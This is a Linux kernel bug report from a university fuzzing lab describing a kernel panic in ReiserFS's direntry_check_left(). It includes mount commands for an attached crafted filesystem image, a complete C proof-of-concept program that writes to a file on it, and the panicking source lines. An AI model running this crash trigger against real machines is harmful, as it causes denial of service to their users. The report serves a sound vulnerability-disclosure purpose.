Bug 200341

Summary: Kernel panic in direntry_check_left() when writing to a file in a reiserfs filesystem
Product: File System Reporter: Wen Xu (wen.xu)
Component: ReiserFSAssignee: ReiseFS developers team (reiserfs-devel)
Status: NEW ---    
Severity: normal CC: wen.xu
Priority: P1    
Hardware: All   
OS: Linux   
Kernel Version: 4.18 Subsystem:
Regression: No Bisected commit-id:
Attachments: The (compressed) crafted image which causes crash

Description Wen Xu 2018-06-28 20:29:31 UTC 
Created attachment 276995 [details]
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 158.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *foo_bar_baz;
  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

  int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) { 
    write(fd, (char *)buf, 517); 
    write(fd, (char *)buf, sizeof(buf)); 
    close(fd); 
  }   
  
}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Location
https://elixir.bootlin.com/linux/latest/source/fs/reiserfs/item_ops.c#L550
	if (entries == dir_u->entry_count) {
		reiserfs_panic(NULL, "item_ops-1",
			       "free space %d, entry_count %d", free,
			       dir_u->entry_count);
	}

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.